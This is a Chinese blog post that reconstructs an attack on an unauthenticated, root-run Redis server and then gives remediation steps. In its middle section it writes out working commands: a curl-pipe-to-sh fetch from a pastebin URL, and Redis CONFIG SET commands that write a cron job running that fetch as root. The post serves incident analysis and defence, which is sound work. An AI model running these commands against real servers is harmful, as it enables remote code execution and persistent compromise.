利用Redis漏洞远程向服务器写入定时任务

最新推荐文章于 2024-09-29 16:10:20 发布
最新推荐文章于 2024-09-29 16:10:20 发布
阅读量5.8k 收藏 21
点赞数 10
分类专栏: 阿里云aliyun 文章标签: redis 服务器 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kouryoushine/article/details/87917762
版权

由于近期阿里云服务器报警redis漏洞,经过调查对黑客的入侵过程进行了整理并模拟一遍,庆幸此次黑客行为未对公司造成影响,同时还让我学习了很多知识,这里分享给大家。

1,被入侵的前提条件
  1. redis没有设置密码 。
  2. redis配置文件没有打开保护模式,并且没有bindIP地址 。
  3. 安全组设置打开了redis的6379端口。
  4. 以root用户启动redis。
    有人可能会问,怎么可能这么傻,连个密码都不设置。现实情况的确如此,redis是同事设置,安全组我在管理,测试阶段打开了这个端口。两人分工不同,就出现了这个漏洞。相信漏洞的产生都是类似的。

2, 入侵前准备

满足以上前提后,意味着黑客通过扫描端口工具锁定你的ip,这时可以远程连接你的redis数据库。

2.1 生成测试脚本

登录https://pastebin.com网站
生成如下测试脚本,并获取raw地址 https://pastebin.com/raw/hx4d4iPS

echo "hello test" >> /root/hello.outtest

在这里插入图片描述

2.2 脚本如何执行

在服务器上直接通过下面命令即可执行上面的脚本

curl -fsSL https://pastebin.com/raw/hx4d4iPS | sh

我技术很弱,是入侵我们服务器的黑客采用了这个网站。这里需要谢谢黑客,教会我新的知识。
这种方式意味着你有在服务器通过简单命令执行复杂脚本的能力。

3 远程连接redis,并执行脚本

3.1 修改redis配置

设置dir到定时任务目录
config set dir "/var/spool/cron"
设置持久化文件名为root
config set dbfilename root

以上两条命令意味着,以后redis所有数据都会保存在/var/spool/cron/root文件中。而这个文件就是root用户的定时任务配置文件。系统会执行该文件定义的定时任务。

step1:清空数据表
127.0.0.1:6379> flushall  
OK
step2:添加一条数据。注意\n表示换行符。
127.0.0.1:6379> set test "\n*/10 * * * *  curl -fsSL https://pastebin.com/raw/7dFmaK9n | sh\n"
OK
step3:保存数据
127.0.0.1:6379> save

3.2查看生成的定时任务脚本

在var/var/spool/cron目录下产生了root文件。
该文件代表了root用户的定时任务文件,系统会按照指定周期执行该文件的内容。

在这里插入图片描述
打开该文件,发现前面\n的效果就是 set的name和value分行存放。
在这里插入图片描述
通过crontab -l命令查看定时任务中已经存在该定时任务。其他乱码可以忽略,我猜想定时任务是按行读取的。
其他不符合语法的行都会执行错误。但是正确的行是可以被执行的。
在这里插入图片描述

3.3 查看定时任务是否生效

tail -f vim /var/log/cron
查看定时任务日志,可以看到上述命令已经被执行。

在这里插入图片描述
/root目录下生成了hello.outtest文件,并且文件内容被定时更新
在这里插入图片描述

以上,就实现了在不登录数据库的情况下写入定时任务的功能。这个漏洞意味着黑客可以在你的服务器为所欲为,具备所有的权限和能力。

4 如何修复该漏洞

4.1 分析可能造成的影响

对方获取redis之后意味着他可以修改你系统的任何一个文件,并往里写入内容。
1,查看定时任务的/etc/crontab 和var/var/spool/cron等文件是否有异常的内容写入
2,查看用户登录秘钥是否有异常写入。(对方可以免密登录你的系统)
3,查看系统登录日志,查看是否有异常登录
4,其他你发现有可能影响的文件

4.2 修复漏洞

1,关闭安全组redis的端口,或者给予最小访问规则
2,修改redis配置文件
参考阿里云的要求,配置完就可以很大程度避免该漏洞的影响。
https://help.aliyun.com/knowledge_detail/37447.html

参考
https://www.idc889.com/detail-1373.html
https://www.cnblogs.com/Dleo/p/6078948.html

如何在5年薪百万
关注
专栏目录
Redis未授权访问漏洞记录(端口:6379、Linux、Windows)
墨痕诉清风的博客
11-12 7186
这就让黑客有了可乘之机,黑客可以远程连接到该数据库。但随着现代的服务部署方式的不断发展,组件化成了不可逃避的大趋势,docker就是这股风潮下的产物之一,而在这种部署模式下,一个单一的容器中不会有除 redis以外的任何服务存在,包括sh和 crontab,再加上权限的严格控制,只靠写文件就很难再 getshell了,在这种情况下,我们就需要其他的利用手段了。并且可以在 /root/.ssh/ 目录下看到我们上传的 authorized_keys 文件,正是由于这个文件的存在,我们才可以在本地用私钥登录。.
浅谈Redis漏洞
weixin_43960884的博客
07-20 404
Redis未授权访问漏洞 Redis是一种key-value键值对的非关系型数据库 默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问等,Redis服务将会暴露到公网上,以及在没有设置密码认证的情况下,会导致任意用户在可以访问目标服务器的情况下进行未授权的访问Redis Redis还支持本地存储,也就导致任意文件写入,攻击者在未授权访...
使用 Redis 来实现定时任务
TTUZ的博客
05-16 7287
Redis 的 2.8.0 版本之后,其推出了一个新的特性——键空间消息(Redis Keyspace Notifications),它配合 2.0.0 版本之后的 SUBSCRIBE 就能完成这个定时任务的操作了,不过定时的单位是秒。Publish / SubscribeRedis 在 2.0.0 之后推出了 Pub / Sub 的指令,大致就是说一边给 Redis 的特定频道发送消息,另一边
Redis - - Redis 远程代码执行漏洞
weixin_34150830的博客
12-14 499
1,利用redis漏洞远程登录服务器 1.1 登录远程 redis写入ssh公钥 [root@test ~]# redis-cli -h 192.168.168.168 -p 6379 -a 123456 # 设置路径等配置(必须有写入权限) 192.168.168.168:6379> config set dir /root/.ssh OK # 上传公钥的备份文件名字为autho...
利用redis实现分布式定时任务
最新发布
weixin_42759398的博客
09-29 911
如果是微服务,两个服务都有定时,那么就出问题了,但是上分布式定时任务框架太麻烦怎么办,那么就用redis加个锁,谁先抢到锁谁执行。但是写起来还要改定时任务代码,贼麻烦,直接用切面 环绕的那种,然后抢到锁执行就行.
Redis未授权访问漏洞(三)Redis写入反弹连接定时任务
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-10 563
这里可以看到我们已经成功用192.168.142.44的redis客户端连接了位192.168.142.66的服务端。我们通过攻击机启动Redis客户端去远程连接靶机的6379端口,模仿黑客通过公网的6379端口入侵企业的Web服务器。我们现在查看一下当前root用户的定时文件有没有我们设置的定时任务。攻击机: Centos7 IP:192.168.142.44。修改数据文件存储路劲为 /var/spool/cron。然后我们再打开一个终端去监听我们本地的7777端口。可以看到定时任务写入成功。
网络安全——redis未授权访问漏洞写入计划任务反弹shell
Demo不是emo的博客
09-17 5801
redis的未授权访问漏洞,顾名思义,就是不需要输入账密就可以直接登录(含redis服务安装包分享),本文介绍了怎么利用漏洞获取目标shell
CTF SSRF redis写入shell、计划任务
03-07 1171
CTF SSRF redis写入shell、计划任务
Redis未授权漏洞复现及利用(window,linux)
dreamthe的博客
03-22 2万+
1.了解redis Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivota赞助。 2.redis漏洞原理 Redis默认情况下是绑定在0.0.0.0:6379端口的,如果没有设置密码(一般密码为空)或者密码为弱密码的情况下并且也没有
Redis未授权访问漏洞引出的漏洞利用方式
Chu_Jian_Xiong的博客
11-20 1377
redis未授权访问漏洞是一个由于redis服务版本较低其未设置登录密码导致的漏洞,攻击者可直接利用redis服务器的ip地址和端口完成redis服务器远程登录,对目标服务器完成后续的控制和利用
redis导致java的cpu过高,redis 漏洞造成服务器被入侵-CPU飙升
weixin_39958631的博客
03-12 666
前言前几天在自己服务器上搭了redis,准备想着大展身手一番,昨天使用redis-cli命令的时候,10s后,显示进程已杀死。然后又试了几次,都是一样的结果,10s时间,进程被杀死。这个时候我还没发现事情的严重性。发现问题进程莫名被杀死,可能是cpu被占满,赶紧看了一下cpu。[root@vm_0_13_centos etc]# top果然如此,cpu被莫名的占满了。简单,根据pid杀死进程就行了...
基于Redis定时任务
weixin_34044273的博客
05-26 5428
为什么80%的码农都做不了架构师?>>> ...
Redis Like
huanglu12138的博客
08-21 1030
项目背景: Redis是一款高效的内存数据库,它有别于传统的关系型数据库,海量数据存取快(传统关系型数据库需要有IO操作,很影响速度),且Redis支持的数据类型比memcached更多。好,既然Redis有这么多的好处,那我能不能自己简单实现一下这么强大的Redis呢?也因此,我自己简单实现了一下Redis服务端。 项目介绍: 简单实现了数据的基本存取操作。 可以允许多个客户端连接,彼此互不相...
网络安全——利用ssrf操作内网redis写入计划任务反弹shell
Demo不是emo的博客
09-17 3503
今天的内容是ssrf漏洞利用,环境选择的是discuz含有ssrf漏洞的版本,通过该漏洞写入redis计划任务反弹shell(附带环境安装包)
如何使用redis做一个定时任务
左小涩°
02-19 1万+
关于redis键空间功能的了解,与java监听的用法
Redis 进行定时任务的操作
热门推荐
saii的专栏
04-16 2万+
在这之前如果你在进行nodejs程序开发的时候需要用到定时任务执行时, 你会怎么做呢?, 一开始的想法就是百度 nodejs 定时任务,基本上所有的内容都是node-schedule 并没有说这种方式是不行的,那有没有更高级一点的方式或者说另外一种方式。答案是有的,我们可以用redis来实现定时器的效果通过查询网上的资料和别人的实现方式,大概整理了如下思路。 Redis 在 2.0.0 之后推出了
(六) Redis 实现Schedule 定时任务
Tang的博客
10-17 3235
Schedule(定时任务) ⼀张图来说明(任务执⾏⻓度超过周期的情况): ​ 虽然定时任务可以嵌⼊到web应⽤程序和WAR⽂件中,但下⾯演⽰⼀种更简单的⽅法创建了⼀个独⽴的应⽤程序。您将所有的内容打包在⼀个单⼀的、可执⾏的JAR⽂件中,⽤⼀个传统Java main()⽅法驱动。这也就是springboot的启动类。 一. 入门案例 1.1 主程序 package com.qianfeng.te...
入侵redis之准备---Linux关于定时任务crontab相关知识了解配合理解shell反弹远程控制
guijianchouxyz的博客
11-25 961
【1】crontab一般来说服务器都是有的,依赖crond服务,这个服务也是必须安装的服务,并且也是开机自启动的服务,也就是说,他基本上是一直在启动着的,至少小编这么多年的运维经验,每台服务器上面都有这个服务并且是正常启动的【2】好多的服务都需要依赖这个服务,比如定时清理日志脚本,定时磁盘检查,配合监控,流量排查甚至还有一些高级命令。比如sar命令,syslog日志轮询都是要依赖这个服务的以上两点,小编想表达的意思是是crontab这个服务很重要。
SSRF_weblogic漏洞复现_定时任务利用
weixin_42786460的博客
09-16 125
SSRF_weblogic漏洞复现_定时任务利用
评论 12
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值